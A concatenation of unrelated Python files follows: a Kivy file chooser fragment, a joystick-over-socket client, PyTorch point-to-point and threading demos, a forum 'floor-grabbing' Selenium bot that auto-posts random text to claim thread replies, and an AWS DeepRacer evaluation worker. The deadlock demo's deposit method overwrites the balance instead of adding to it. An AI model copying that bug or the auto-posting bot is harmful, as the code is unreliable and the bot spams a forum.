except OSError:
return False
except:
return False
def compute_size(maxs, imgw, imgh):
if imgw > imgh:
return maxs, maxs*imgh/imgw
else:
return maxs*imgw/imgh, maxs
if __name__ == "__main__":
from kivy.base import runTouchApp
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
box = BoxLayout(orientation="vertical")
fileChooser = StudioFileChooserThumbView(thumbsize=128)
label = Label(markup=True, size_hint_y=None)
fileChooser.mylabel = label
box.add_widget(fileChooser)
box.add_widget(label)
def setlabel(instance, value):
instance.mylabel.text = "[b]Selected:[/b] {0}".format(value)
fileChooser.bind(selection=setlabel)
runTouchApp(box)
|
hydrogenClient_surface.py
|
import sys
import socket
import select
import pygame
import time
import serial as s
import threading
from serial import SerialException
# import pyfirmata
########Below is superfluous code necessary only for receiving and sending controller input
pygame.init()
joystick1 = pygame.joystick.Joystick(0)
joystick2 = pygame.joystick.Joystick(1)
joystick1.init()
joystick2.init()
def print_data():
data = []
for x in range(6):
data.append(joystick1.get_axis(x))
# 0: x axis left thumb, 1: y axis left thumb
# 2: x axis right thumb, 3: y axis right thumb
# 4: right trigger, 5: left trigger
for x in range(6):
data.append(joystick1.get_button(x))
# A = 0, B = 1, X = 2, Y = 3, LB = 4, RB = 5
for x in range(6):
data.append(joystick2.get_axis(x))
for x in range(6):
data.append(joystick2.get_button(x))
mesg = ''
mesg = ' '.join([str(round(i, 2)) for i in data])
## data = joystick1.get_axis(0)
## data2 = joystick1.get_axis(1)
## data3 = joystick1.get_axis(2)
## data4 = joystick1.get_axis(3)
## data5 = joystick1.get_axis(4)
## data6 = joystick1.get_axis(5)
## data7 = joystick1.get_button(10)
## data8 = joystick2.get_button(1)
## data9 = joystick2.get_axis(0)
##
## data = round(data, 2)
## data2 = round(data2, 2)
## data3 = round(data3, 2)
## data4 = round(data4, 2)
## data5 = round(data5, 2)
## data6 = round(data6, 2)
## data9 = round(data9, 2)
## mesg = str(data) + " " + str(data2) + " " + str(data3) + " " + str(data4) + " " + str(data5) + " " + str(data6) +" "+str(data7) + " " + str(data7) + " " + str(data8) + " " + str(data9)
## # print msg
##
pygame.event.pump()
time.sleep(0.05)
return mesg
# #setup pyFirmata
# board = pyfirmata.Arduino('/dev/cu.usbmodem1421')
# #setup an iterator for safety
# iter8 = pyfirmata.util.Iterator(board)
# iter8.start()
# #locate pins
# pin9 = board.get_pin('d:9:s') #motor 1
# # pin8 = board.get_pin('d:8:s') #motor 2
# def move1(a):
# pin9.write(a)
# def move2(a):
# pin8.write(a)
########Multiple clients connect to a server than send and receive data to all clients
def chat_client(host='192.168.1.2',port=9009):
if (host == None or port == None):
if(len(sys.argv) < 3):
print('Usage: python chat_client.py hostname port')
sys.exit()
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
# connect to remote host
try:
s.connect((host, port))
except:
print('Unable to connect')
sys.exit()
print('Connected to remote host. You can start sending messages')
print('[Me] ')
sys.stdout.flush()
while True:
socket_list = [sys.stdin, s]
# Get the list sockets which are readable
ready_to_read,ready_to_write,in_error = select.select(socket_list , [], [])
for sock in ready_to_read:
if sock == s:
# incoming message from remote server, s
data = sock.recv(4096)
if not data:
print('\nDisconnected from chat server')
sys.exit()
else:
#print data
#print('\033[2J')
print '\033[2J',
print data
print '[Me] ',
else :
# user entered a message
msg = print_data()
s.send(msg)
print '\r\033[A\033[K',
print msg + '\n[Me]',
t1 = threading.Thread(target = chat_client)
t1.start()
|
async_p2p.py
|
import os
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
"""Non-blocking point-to-point communication."""
def run(rank, size):
tensor = torch.zeros(1)
req = None
if rank == 0:
tensor += 1
# Send the tensor to process 1
req = dist.isend(tensor=tensor, dst=1)
print('Rank 0 started sending')
else:
# Receive tensor from process 0
req = dist.irecv(tensor=tensor, src=0)
print('Rank 1 started receiving')
req.wait()
print('Rank ', rank, ' has data ', tensor[0])
def init_process(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
if __name__ == "__main__":
size = 2
processes = []
mp.set_start_method("spawn")
for rank in range(size):
p = mp.Process(target=init_process, args=(rank, size, run))
p.start()
processes.append(p)
for p in processes:
p.join()
|
sys_exc_info.py
|
#!/usr/bin/env python3
# encoding: utf-8
#end_pymotw_header
import sys
import threading
import time
def do_something_with_exception():
exc_type, exc_value = sys.exc_info()[:2]
print('Handling {} exception with message "{}" in {}'.format(
exc_type.__name__, exc_value,
threading.current_thread().name))
def cause_exception(delay):
time.sleep(delay)
raise RuntimeError('This is the error message')
def thread_target(delay):
try:
cause_exception(delay)
except RuntimeError:
do_something_with_exception()
threads = [
threading.Thread(target=thread_target, args=(0.3,)),
threading.Thread(target=thread_target, args=(0.1,)),
]
for t in threads:
t.start()
for t in threads:
t.join()
|
main.py
|
#coding:utf-8
from tkinter import *
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import threading
import random
class Automan(Frame):
def __init__(self,master=None):
Frame.__init__(self, master)
self.pack()
self.createWidgets()
def createWidgets(self):
self.username_var= StringVar(self,'')
self.password_var=StringVar(self,'')
self.login_url_var=StringVar(self,'http://dev3.securitytown.net/login')
self.auto_url_var=StringVar(self,'http://dev3.securitytown.net/group/14/thread/33')
#self.login_url_var=StringVar(self,'http://www.sectown.cn/login')
#self.auto_url_var=StringVar(self,'https://www.sectown.cn/group/14/thread/')
self.sleeptime_var=StringVar(self,'0.1')
self.target_floor_var=StringVar(self,'0')
self.con_var=StringVar(self,u'酷酷的我抢到了这一层!')
self.info_var=StringVar(self,u'')
self.check_box_var=IntVar(self)
self.hint_var=StringVar(self,u'不要多开该程序,需要重新抢楼的话请终止抢楼先。\n有问题就联系金成强。不要提奇奇怪怪的需求!\n')
self.hint_label=Label(self)
self.hint_label['textvariable']=self.hint_var
self.hint_label.pack()
self.username_label = Label(self)
self.username_label['text']=u'账号'
self.username_label.pack()
self.username_entry=Entry(self)
self.username_entry['textvariable']=self.username_var
self.username_entry.pack()
self.password_label=Label(self)
self.password_label['text']=u'密码'
self.password_label.pack()
self.password_entry = Entry(self)
self.password_entry['textvariable'] = self.password_var
self.password_entry.pack()
self.login_url_label=Label(self)
self.login_url_label['text']=u'登录账号网址'
self.login_url_label.pack()
self.login_url_entry = Entry(self)
self.login_url_entry['textvariable'] = self.login_url_var
self.login_url_entry['width']=30
self.login_url_entry.pack()
self.auto_url_label=Label(self)
self.auto_url_label['text']=u'抢楼网址'
self.auto_url_label.pack()
self.auto_url_entry = Entry(self)
self.auto_url_entry['textvariable'] = self.auto_url_var
self.auto_url_entry['width'] = 50
self.auto_url_entry.pack()
self.sleeptime_label=Label(self)
self.sleeptime_label['text']=u'刷新等待时间'
self.sleeptime_label.pack()
self.sleeptime_entry = Entry(self)
self.sleeptime_entry['textvariable'] = self.sleeptime_var
self.sleeptime_entry.pack()
self.target_floor_label=Label(self)
self.target_floor_label['text']=u'目标楼层'
self.target_floor_label.pack()
self.target_floor_entry = Entry(self)
self.target_floor_entry['textvariable'] = self.target_floor_var
self.target_floor_entry.pack()
self.con_label = Label(self)
self.con_label['text']='Content'
self.con_label.pack()
self.con_entry = Entry(self)
self.con_entry['textvariable'] = self.con_var
self.con_entry.pack()
self.check_box=Checkbutton(self,text=u'是否自动刷楼',variable=self.check_box_var)
self.check_box.pack()
self.botton1=Button(self)
self.botton1['text']=u'开始抢楼'
self.botton1['command']=self.thread_control
self.botton1.pack()
self.botton2 = Button(self)
self.botton2['text'] = u'停止抢楼'
self.botton2['command'] = self.quit_auto
self.botton2.pack()
self.info_label=Label(self)
self.info_label['textvariable']=self.info_var
self.info_label['bg']='red'
self.info_label.pack()
self.botton3=Button(self,text=u'测试')
self.botton3['command']=self.ceshi
self.botton3.pack()
self.thread_flag=True
def ceshi(self):
self.lang_list = []
f = open('random_lang.txt', 'r')
lines = f.readlines()
for line in lines:
self.lang_list.append(line.decode('utf-8'))
pass
def login(self):
self.username=self.username_var.get()
self.password=self.password_var.get()
self.login_url=self.login_url_var.get()
self.auto_url=self.auto_url_var.get()
self.browser = webdriver.Chrome('./chromedriver')
self.sleeptime=float(self.sleeptime_var.get())
self.target_floor=int(self.target_floor_var.get())-1
self.con=self.con_var.get()
self.browser.get(self.login_url)
user = self.browser.find_element_by_name('_username')
pwd = self.browser.find_element_by_name('_password')
user.send_keys(self.username)
pwd.send_keys(self.password)
pwd.send_keys(Keys.RETURN)
self.auto_done()
def auto_done(self):
self.browser.execute_script('window.open("%s")'%self.auto_url)
time.sleep(1)
handles = self.browser.window_handles
self.browser.switch_to_window(handles[-1])
floor=self.browser.find_elements_by_xpath('//*[@class="floor"]')
test_floor=floor[-1].text
test_floor_num=int(test_floor[:-1])
# last_page_ele = self.browser.find_element_by_xpath('//*[@class="pagination cd-pagination"]/li[last()]/a')
# last_page = last_page_ele.get_attribute('href')
last_page=self.auto_url_var.get()+'?page=99'
self.browser.execute_script('window.open("%s")' % last_page)
time.sleep(1)
while 1:
if self.thread_flag==False:
self.info_var.set(u'您已终止程序')
self.browser.quit()
break
if test_floor_num>31:
last_page_ele_try = self.browser.find_element_by_xpath('//*[@class="pagination cd-pagination"]/li[last()]/a')
last_page_try = last_page_ele_try.get_attribute('href')
if last_page_try!=last_page:
last_page=last_page_try
self.browser.execute_script('window.open("%s")' % last_page)
time.sleep(1)
else:
pass
handles = self.browser.window_handles
self.browser.switch_to_window(handles[-1])
floor = self.browser.find_elements_by_xpath('//*[@class="floor"]')
last_floor = floor[-1].text
self.info_var.set(u'目前楼层数' + last_floor)
last_floor_num=int(last_floor[:-1])
if last_floor_num == self.target_floor:
time.sleep(1)
self.get_floor()
# content = self.browser.find_element_by_tag_name('iframe')
# self.browser.switch_to_frame(content)
# p = self.browser.find_element_by_tag_name('body')
# p.send_keys(self.con)
# self.browser.switch_to_default_content()
# self.browser.find_element_by_id('post-thread-btn').click()
self.browser.quit()
self.info_var.set(u'恭喜抢楼成功,抢到楼层%d'%(self.target_floor+1))
break
else:
if last_floor_num<self.target_floor:
if self.check_box_var.get()==1:
self.browser.switch_to_window(handles[-1])
self.get_floor()
continue
self.browser.refresh()
time.sleep(self.sleeptime)
else:
self.browser.quit()
self.info_var.set(u'抱歉,您要抢的楼层已经不存在,重新调整楼层位置')
break
#输入内容发送
def get_floor(self):
content = self.browser.find_element_by_tag_name('iframe')
self.browser.switch_to_frame(content)
p = self.browser.find_element_by_tag_name('body')
#p.send_keys(self.con)
p.send_keys(self.lang_list[random.randint(0,len(self.lang_list)-1)])
self.browser.switch_to_default_content()
self.browser.find_element_by_id('post-thread-btn').click()
pass
def quit_auto(self):
self.thread_flag=False
def read_lang(self):
self.lang_list = []
f = open('random_lang.txt', 'r')
lines = f.readlines()
for line in lines:
self.lang_list.append(line.decode('utf-8'))
pass
def thread_control(self):
self.thread_flag=True
self.t=threading.Thread(target=self.login)
self.t.setDaemon(True)
self.t.start()
if __name__ == '__main__':
root=Tk()
root.title(u'安全通内部抢楼机器人')
root.wm_attributes('-topmost', 1)
root.geometry('400x600+30+30')
auto_man=Automan(master=root)
auto_man.mainloop()
|
multithreading_deadlock.py
|
#coding=utf-8
'''
This example is for multithreading deadlock demo.
'''
import time
import threading
class Account:
def __init__(self, _id, money, lock):
self.id = _id
self.money = money
self.lock = lock
def withdraw(self, amount):
self.money -= amount
def deposit(self, amount):
self.money = amount
def transfer(_from, to, amount):
if _from.lock.acquire():#鎖住自己的賬戶
_from.withdraw(amount)
time.sleep(1)#讓交易時間變長,2個交易執行緒時間上重疊,有足夠時間來產生死鎖
print('wait for lock...')
if to.lock.acquire():#鎖住對方的賬戶
to.deposit(amount)
to.lock.release()
_from.lock.release()
print('finish...')
a = Account('a', 1000, threading.Lock())
b = Account('b', 1000, threading.Lock())
threading.Thread(target = transfer, args = (a, b, 100)).start()
threading.Thread(target = transfer, args = (b, a, 200)).start()
|
evaluation_worker.py
|
"""This module is responsible for launching evaluation jobs"""
import argparse
import json
import logging
import os
import time
from threading import Thread
import rospy
from markov import utils
from markov.agent_ctrl.constants import ConfigParams
from markov.agents.rollout_agent_factory import (
create_bot_cars_agent,
create_obstacles_agent,
create_rollout_agent,
)
from markov.agents.utils import RunPhaseSubject
from markov.boto.s3.constants import (
CAMERA_45DEGREE_LOCAL_PATH_FORMAT,
CAMERA_PIP_MP4_LOCAL_PATH_FORMAT,
CAMERA_TOPVIEW_LOCAL_PATH_FORMAT,
MODEL_METADATA_LOCAL_PATH_FORMAT,
MODEL_METADATA_S3_POSTFIX,
SIMTRACE_EVAL_LOCAL_PATH_FORMAT,
ModelMetadataKeys,
SimtraceVideoNames,
)
from markov.boto.s3.files.checkpoint import Checkpoint
from markov.boto.s3.files.model_metadata import ModelMetadata
from markov.boto.s3.files.simtrace_video import SimtraceVideo
from markov.boto.s3.utils import get_s3_key
from markov.camera_utils import configure_camera
from markov.constants import DEFAULT_PARK_POSITION, ROLLOUT_WORKER_PROFILER_PATH, SIMAPP_VERSION_2
from markov.defaults import reward_function
from markov.environments.constants import LINK_NAMES, STEERING_TOPICS, VELOCITY_TOPICS
from markov.log_handler.constants import (
SIMAPP_EVENT_ERROR_CODE_500,
SIMAPP_SIMULATION_WORKER_EXCEPTION,
)
from markov.log_handler.deepracer_exceptions import GenericRolloutError, GenericRolloutException
from markov.log_handler.exception_handler import log_and_exit
from markov.log_handler.logger import Logger
from markov.metrics.constants import MetricsS3Keys
from markov.metrics.iteration_data import IterationData
from markov.metrics.s3_metrics import EvalMetrics
from markov.reset.constants import RaceType
from markov.rollout_utils import (
PhaseObserver,
configure_environment_randomizer,
get_robomaker_profiler_env,
signal_robomaker_markov_package_ready,
)
from markov.rospy_wrappers import ServiceProxyWrapper
from markov.s3_boto_data_store import S3BotoDataStore, S3BotoDataStoreParameters
from markov.sagemaker_graph_manager import get_graph_manager
from markov.track_geom.track_data import TrackData
from markov.track_geom.utils import get_start_positions
from rl_coach.base_parameters import TaskParameters
from rl_coach.core_types import EnvironmentSteps
from rl_coach.data_stores.data_store import SyncFiles
from std_srvs.srv import Empty, EmptyRequest
logger = Logger(__name__, logging.INFO).get_logger()
MIN_RESET_COUNT = 10000 # TODO: change when console passes float("inf")
IS_PROFILER_ON, PROFILER_S3_BUCKET, PROFILER_S3_PREFIX = get_robomaker_profiler_env()
def evaluation_worker(
graph_manager,
number_of_trials,
task_parameters,
simtrace_video_s3_writers,
is_continuous,
park_positions,
race_type,
pause_physics,
unpause_physics,
):
"""Evaluation worker function
Arguments:
graph_manager(MultiAgentGraphManager): Graph manager of multiagent graph manager
number_of_trials(int): Number of trails you want to run the evaluation
task_parameters(TaskParameters): Information of the checkpoint, gpu/cpu,
framework etc of rlcoach
simtrace_video_s3_writers(list): Information to upload to the S3 bucket all the simtrace and mp4
is_continuous(bool): The termination condition for the car
park_positions(list of tuple): list of (x, y) for cars to park at
race_type (str): race type
"""
# Collect profiler information only IS_PROFILER_ON is true
with utils.Profiler(
s3_bucket=PROFILER_S3_BUCKET,
s3_prefix=PROFILER_S3_PREFIX,
output_local_path=ROLLOUT_WORKER_PROFILER_PATH,
enable_profiling=IS_PROFILER_ON,
):
subscribe_to_save_mp4_topic, unsubscribe_from_save_mp4_topic = list(), list()
subscribe_to_save_mp4, unsubscribe_from_save_mp4 = list(), list()
for agent_param in graph_manager.agents_params:
racecar_name = (
"racecar"
if len(agent_param.name.split("_")) == 1
else "racecar_{}".format(agent_param.name.split("_")[1])
)
subscribe_to_save_mp4_topic.append(
"/{}/save_mp4/subscribe_to_save_mp4".format(racecar_name)
)
unsubscribe_from_save_mp4_topic.append(
"/{}/save_mp4/unsubscribe_from_save_mp4".format(racecar_name)
)
graph_manager.data_store.wait_for_checkpoints()
graph_manager.data_store.modify_checkpoint_variables()
# wait for the required cancel services to become available
if race_type != RaceType.F1.value:
# TODO: Since we are not running Grand Prix in RoboMaker,
# we are opting out from waiting for RoboMaker's cancel job service
# in case of Grand Prix execution.
# Otherwise, SimApp will hang as service will never come alive.
#
# If we don't depend on RoboMaker anymore in the future,
# we need to remove below line, or do a better job to figure out
# whether we are running on RoboMaker or not to decide whether
# we should wait for below service or not.
rospy.wait_for_service("/robomaker/job/cancel")
# Make the clients that will allow us to pause and unpause the physics
rospy.wait_for_service("/gazebo/pause_physics_dr")
rospy.wait_for_service("/gazebo/unpause_physics_dr")
pause_physics = ServiceProxyWrapper("/gazebo/pause_physics_dr", Empty)
unpause_physics = ServiceProxyWrapper("/gazebo/unpause_physics_dr", Empty)
for mp4_sub, mp4_unsub in zip(subscribe_to_save_mp4_topic, unsubscribe_from_save_mp4_topic):
rospy.wait_for_service(mp4_sub)
rospy.wait_for_service(mp4_unsub)
for mp4_sub, mp4_unsub in zip(subscribe_to_save_mp4_topic, unsubscribe_from_save_mp4_topic):
subscribe_to_save_mp4.append(ServiceProxyWrapper(mp4_sub, Empty))
unsubscribe_from_save_mp4.append(
Thread(target=ServiceProxyWrapper(mp4_unsub, Empty), args=(EmptyRequest(),))
)
graph_manager.create_graph(
task_parameters=task_parameters,
stop_physics=pause_physics,
start_physics=unpause_physics,
empty_service_call=EmptyRequest,
)
logger.info("Graph manager successfully created the graph: Unpausing physics")
unpause_physics(EmptyRequest())
is_save_mp4_enabled = rospy.get_param("MP4_S3_BUCKET", None)
if is_save_mp4_enabled:
for subscribe_mp4 in subscribe_to_save_mp4:
subscribe_mp4(EmptyRequest())
configure_environment_randomizer()
track_data = TrackData.get_instance()
# Before each evaluation episode (single lap for non-continuous race and complete race for
# continuous race), a new copy of park_positions needs to be loaded into track_data because
# a park position will be pop from park_positions when a racer car need to be parked.
if is_continuous:
track_data.park_positions = park_positions
graph_manager.evaluate(EnvironmentSteps(1))
else:
for _ in range(number_of_trials):
track_data.park_positions = park_positions
graph_manager.evaluate(EnvironmentSteps(1))
if is_save_mp4_enabled:
for unsubscribe_mp4 in unsubscribe_from_save_mp4:
unsubscribe_mp4.start()
for unsubscribe_mp4 in unsubscribe_from_save_mp4:
unsubscribe_mp4.join()
# upload simtrace and mp4 into s3 bucket
for s3_writer in simtrace_video_s3_writers:
s3_writer.persist(utils.get_s3_kms_extra_args())
time.sleep(1)
pause_physics(EmptyRequest())
if race_type != RaceType.F1.value:
# Close the down the job
utils.cancel_simulation_job()
def main():
"""Main function for evaluation worker"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-p",
"--preset",
help="(string) Name of a preset to run \
(class name from the 'presets' directory.)",
type=str,
required=False,
)
parser.add_argument(
"--s3_bucket",
help="list(string) S3 bucket",
type=str,
nargs="+",
default=rospy.get_param("MODEL_S3_BUCKET", ["gsaur-test"]),
)
parser.add_argument(
"--s3_prefix",
help="list(string) S3 prefix",
type=str,
nargs="+",
default=rospy.get_param("MODEL_S3_PREFIX", ["sagemaker"]),
)
parser.add_argument(
"--aws_region",
help="(string) AWS region",
type=str,
default=rospy.get_param("AWS_REGION", "us-east-1"),
)
parser.add_argument(
"--number_of_trials",
help="(integer) Number of trials",
type=int,
default=int(rospy.get_param("NUMBER_OF_TRIALS", 10)),
)
parser.add_argument(
"-c",
"--local_model_directory",
help="(string) Path to a folder containing a checkpoint \
to restore the model from.",
type=str,
default="./checkpoint",
)
parser.add_argument(
"--number_of_resets",
help="(integer) Number of resets",
type=int,
default=int(rospy.get_param("NUMBER_OF_RESETS", 0)),
)
parser.add_argument(
"--penalty_seconds",
help="(float) penalty second",
type=float,
default=float(rospy.get_param("PENALTY_SECONDS", 2.0)),
)
parser.add_argument(
"--job_type",
help="(string) job type",
type=str,
default=rospy.get_param("JOB_TYPE", "EVALUATION"),
)
parser.add_argument(
"--is_continuous",
help="(boolean) is continous after lap completion",
type=bool,
default=utils.str2bool(rospy.get_param("IS_CONTINUOUS", False)),
)
parser.add_argument(
"--race_type",
help="(string) Race type",
type=str,
default=rospy.get_param("RACE_TYPE", "TIME_TRIAL"),
)
parser.add_argument(
"--off_track_penalty",
help="(float) off track penalty second",
type=float,
default=float(rospy.get_param("OFF_TRACK_PENALTY", 2.0)),
)
parser.add_argument(
"--collision_penalty",
help="(float) collision penalty second",
type=float,
default=float(rospy.get_param("COLLISION_PENALTY", 5.0)),
)
args = parser.parse_args()
arg_s3_bucket = args.s3_bucket
arg_s3_prefix = args.s3_prefix
logger.info("S3 bucket: %s \n S3 prefix: %s", arg_s3_bucket, arg_s3_prefix)
metrics_s3_buckets = rospy.get_param("METRICS_S3_BUCKET")
metrics_s3_object_keys = rospy.get_param("METRICS_S3_OBJECT_KEY")
arg_s3_bucket, arg_s3_prefix = utils.force_list(arg_s3_bucket), utils.force_list(arg_s3_prefix)
metrics_s3_buckets = utils.force_list(metrics_s3_buckets)
metrics_s3_object_keys = utils.force_list(metrics_s3_object_keys)
validate_list = [arg_s3_bucket, arg_s3_prefix, metrics_s3_buckets, metrics_s3_object_keys]
simtrace_s3_bucket = rospy.get_param("SIMTRACE_S3_BUCKET", None)
mp4_s3_bucket = rospy.get_param("MP4_S3_BUCKET", None)
if simtrace_s3_bucket:
simtrace_s3_object_prefix = rospy.get_param("SIMTRACE_S3_PREFIX")
simtrace_s3_bucket = utils.force_list(simtrace_s3_bucket)
simtrace_s3_object_prefix = utils.force_list(simtrace_s3_object_prefix)
validate_list.extend([simtrace_s3_bucket, simtrace_s3_object_prefix])
if mp4_s3_bucket:
mp4_s3_object_prefix = rospy.get_param("MP4_S3_OBJECT_PREFIX")
mp4_s3_bucket = utils.force_list(mp4_s3_bucket)
mp4_s3_object_prefix = utils.force_list(mp4_s3_object_prefix)
validate_list.extend([mp4_s3_bucket, mp4_s3_object_prefix])
if not all([lambda x: len(x) == len(validate_list[0]), validate_list]):
log_and_exit(
"Eval worker error: Incorrect arguments passed: {}".format(validate_list),
SIMAPP_SIMULATION_WORKER_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500,
)
if args.number_of_resets != 0 and args.number_of_resets < MIN_RESET_COUNT:
raise GenericRolloutException("number of resets is less than {}".format(MIN_RESET_COUNT))
# Instantiate Cameras
if len(arg_s3_bucket) == 1:
configure_camera(namespaces=["racecar"])
else:
configure_camera(
namespaces=[
"racecar_{}".format(str(agent_index)) for agent_index in range(len(arg_s3_bucket))
]
)
agent_list = list()
s3_bucket_dict = dict()
s3_prefix_dict = dict()
checkpoint_dict = dict()
simtrace_video_s3_writers = []
start_positions = get_start_positions(len(arg_s3_bucket))
done_condition = utils.str_to_done_condition(rospy.get_param("DONE_CONDITION", any))
park_positions = utils.pos_2d_str_to_list(rospy.get_param("PARK_POSITIONS", []))
# if not pass in park positions for all done condition case, use default
if not park_positions:
park_positions = [DEFAULT_PARK_POSITION for _ in arg_s3_bucket]
for agent_index, _ in enumerate(arg_s3_bucket):
agent_name = "agent" if len(arg_s3_bucket) == 1 else "agent_{}".format(str(agent_index))
racecar_name = (
"racecar" if len(arg_s3_bucket) == 1 else "racecar_{}".format(str(agent_index))
)
s3_bucket_dict[agent_name] = arg_s3_bucket[agent_index]
s3_prefix_dict[agent_name] = arg_s3_prefix[agent_index]
# download model metadata
model_metadata = ModelMetadata(
bucket=arg_s3_bucket[agent_index],
s3_key=get_s3_key(arg_s3_prefix[agent_index], MODEL_METADATA_S3_POSTFIX),
region_name=args.aws_region,
local_path=MODEL_METADATA_LOCAL_PATH_FORMAT.format(agent_name),
)
model_metadata_info = model_metadata.get_model_metadata_info()
version = model_metadata_info[ModelMetadataKeys.VERSION.value]
# checkpoint s3 instance
checkpoint = Checkpoint(
bucket=arg_s3_bucket[agent_index],
s3_prefix=arg_s3_prefix[agent_index],
region_name=args.aws_region,
agent_name=agent_name,
checkpoint_dir=args.local_model_directory,
)
# make coach checkpoint compatible
if version < SIMAPP_VERSION_2 and not checkpoint.rl_coach_checkpoint.is_compatible():
checkpoint.rl_coach_checkpoint.make_compatible(checkpoint.syncfile_ready)
# get best model checkpoint string
model_checkpoint_name = checkpoint.deepracer_checkpoint_json.get_deepracer_best_checkpoint()
# Select the best checkpoint model by uploading rl coach .coach_checkpoint file
checkpoint.rl_coach_checkpoint.update(
model_checkpoint_name=model_checkpoint_name,
s3_kms_extra_args=utils.get_s3_kms_extra_args(),
)
checkpoint_dict[agent_name] = checkpoint
agent_config = {
"model_metadata": model_metadata,
ConfigParams.CAR_CTRL_CONFIG.value: {
ConfigParams.LINK_NAME_LIST.value: [
link_name.replace("racecar", racecar_name) for link_name in LINK_NAMES
],
ConfigParams.VELOCITY_LIST.value: [
velocity_topic.replace("racecar", racecar_name)
for velocity_topic in VELOCITY_TOPICS
],
ConfigParams.STEERING_LIST.value: [
steering_topic.replace("racecar", racecar_name)
for steering_topic in STEERING_TOPICS
],
ConfigParams.CHANGE_START.value: utils.str2bool(
rospy.get_param("CHANGE_START_POSITION", False)
),
ConfigParams.ALT_DIR.value: utils.str2bool(
rospy.get_param("ALTERNATE_DRIVING_DIRECTION", False)
),
ConfigParams.MODEL_METADATA.value: model_metadata,
ConfigParams.REWARD.value: reward_function,
ConfigParams.AGENT_NAME.value: racecar_name,
ConfigParams.VERSION.value: version,
ConfigParams.NUMBER_OF_RESETS.value: args.number_of_resets,
ConfigParams.PENALTY_SECONDS.value: args.penalty_seconds,
ConfigParams.NUMBER_OF_TRIALS.value: args.number_of_trials,
ConfigParams.IS_CONTINUOUS.value: args.is_continuous,
ConfigParams.RACE_TYPE.value: args.race_type,
ConfigParams.COLLISION_PENALTY.value: args.collision_penalty,
ConfigParams.OFF_TRACK_PENALTY.value: args.off_track_penalty,
ConfigParams.START_POSITION.value: start_positions[agent_index],
ConfigParams.DONE_CONDITION.value: done_condition,
},
}
metrics_s3_config = {
MetricsS3Keys.METRICS_BUCKET.value: metrics_s3_buckets[agent_index],
MetricsS3Keys.METRICS_KEY.value: metrics_s3_object_keys[agent_index],
# Replaced rospy.get_param('AWS_REGION') to be equal to the argument being passed
# or default argument set
MetricsS3Keys.REGION.value: args.aws_region,
}
aws_region = rospy.get_param("AWS_REGION", args.aws_region)
if simtrace_s3_bucket:
simtrace_video_s3_writers.append(
SimtraceVideo(
upload_type=SimtraceVideoNames.SIMTRACE_EVAL.value,
bucket=simtrace_s3_bucket[agent_index],
s3_prefix=simtrace_s3_object_prefix[agent_index],
region_name=aws_region,
local_path=SIMTRACE_EVAL_LOCAL_PATH_FORMAT.format(agent_name),
)
)
if mp4_s3_bucket:
simtrace_video_s3_writers.extend(
[
SimtraceVideo(
upload_type=SimtraceVideoNames.PIP.value,
bucket=mp4_s3_bucket[agent_index],
s3_prefix=mp4_s3_object_prefix[agent_index],
region_name=aws_region,
local_path=CAMERA_PIP_MP4_LOCAL_PATH_FORMAT.format(agent_name),
),
SimtraceVideo(
upload_type=SimtraceVideoNames.DEGREE45.value,
bucket=mp4_s3_bucket[agent_index],
s3_prefix=mp4_s3_object_prefix[agent_index],
region_name=aws_region,
local_path=CAMERA_45DEGREE_LOCAL_PATH_FORMAT.format(agent_name),
),
SimtraceVideo(
upload_type=SimtraceVideoNames.TOPVIEW.value,
bucket=mp4_s3_bucket[agent_index],
s3_prefix=mp4_s3_object_prefix[agent_index],
region_name=aws_region,
local_path=CAMERA_TOPVIEW_LOCAL_PATH_FORMAT.format(agent_name),
),
]
)
run_phase_subject = RunPhaseSubject()
agent_list.append(
create_rollout_agent(
agent_config,
EvalMetrics(agent_name, metrics_s3_config, args.is_continuous),
run_phase_subject,
)
)
agent_list.append(create_obstacles_agent())
agent_list.append(create_bot_cars_agent())
# ROS service to indicate all the robomaker markov packages are ready for consumption
signal_robomaker_markov_package_ready()
PhaseObserver("/agent/training_phase", run_phase_subject)
enable_domain_randomization = utils.str2bool(
rospy.get_param("ENABLE_DOMAIN_RANDOMIZATION", False)
)
sm_hyperparams_dict = {}
# Make the clients that will allow us to pause and unpause the physics
rospy.wait_for_service("/gazebo/pause_physics_dr")
rospy.wait_for_service("/gazebo/unpause_physics_dr")
pause_physics = ServiceProxyWrapper("/gazebo/pause_physics_dr", Empty)
unpause_physics = ServiceProxyWrapper("/gazebo/unpause_physics_dr", Empty)
graph_manager, _ = get_graph_manager(
hp_dict=sm_hyperparams_dict,
agent_list=agent_list,
run_phase_subject=run_phase_subject,
enable_domain_randomization=enable_domain_randomization,
done_condition=done_condition,
pause_physics=pause_physics,
unpause_physics=unpause_physics,
)
ds_params_instance = S3BotoDataStoreParameters(checkpoint_dict=checkpoint_dict)
graph_manager.data_store = S3BotoDataStore(
params=ds_params_instance, graph_manager=graph_manager, ignore_lock=True
)
graph_manager.env_params.seed = 0
task_parameters = TaskParameters()
task_parameters.checkpoint_restore_path = args.local_model_directory
evaluation_worker(
graph_manager=graph_manager,
number_of_trials=args.number_of_trials,
task_parameters=task_parameters,
simtrace_video_s3_writers=simtrace_video_s3_writers,
is_continuous=args.is_continuous,
park_positions=park_positions,
race_type=args.race_type,
pause_physics=pause_physics,
unpause_physics=unpause_physics,
)
if __name__ == "__main__":
try:
rospy.init_node("rl_coach", anonymous=True)
main()
except ValueError as err:
if utils.is_user_error(err):
log_and_exit(
"User modified model/model_metadata: {}".format(err),
SIMAPP_SIMULATION_WORKER_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500,
)
else:
log_and_exit(
"Eval worker value error: {}".format(err),
SIMAPP_SIMULATION_WORKER_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500,
)
except GenericRolloutError as ex:
ex.log_except_and_exit()
except GenericRolloutException as ex:
ex.log_except_and_exit()
except Exception as ex:
log_and_exit(
"Eval worker error: {}".format(ex),
SIMAPP_SIMULATION_WORKER_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500,
)
|
spanprocessor.py
